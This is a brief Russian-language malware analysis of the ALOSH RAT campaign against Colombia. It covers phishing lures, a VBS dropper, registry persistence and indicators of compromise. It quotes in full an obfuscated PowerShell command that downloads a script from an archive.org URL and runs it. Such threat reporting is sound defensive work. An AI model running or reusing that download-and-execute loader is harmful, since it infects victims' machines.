ALOSH - вредоносное программное обеспечение, с помощью которого осуществлялись атаки на Колумбию. Этот агент начинает заражение через электронную почту с очень общими темами, такими как повестка в суд или банковские платежи, с подделанным html-видом, где значок, выдаваемый за вложение, на самом деле является изображением со ссылкой для загрузки сжатого файла с One Drive.
ALOSH RAT
Фишинговые электронные письма, содержащие один и тот же вредоносный образец
Файл .rar содержит сценарий Visual Basic с тем же именем "citacion juzgado.vbs", который создаст объект Windows Script Host Shell Object для загрузки и выполнения нового сценария Powershell путем выполнения следующей команды:
1 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I`E`X((n`e`W`-Obj`E`c`T(('Net.Webclient'))).(('Downloadstri'+'ng')).InVokE((('https://ia601509.us.archive.org/20/items/3_20210512_20210512_1430/3.txt'))))). |
Этот сценарий Powershell загрузит ряд других различных сценариев, которые будут помещены в "C:\Users\Public\" и "C:\ProgramData\Microsoft Arts\Start\", и установит постоянство, используя ключ реестра "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders".
Последовательность заражения
Indicators of Compromise
IPv4
- 172.96.187.2
- 181.141.0.30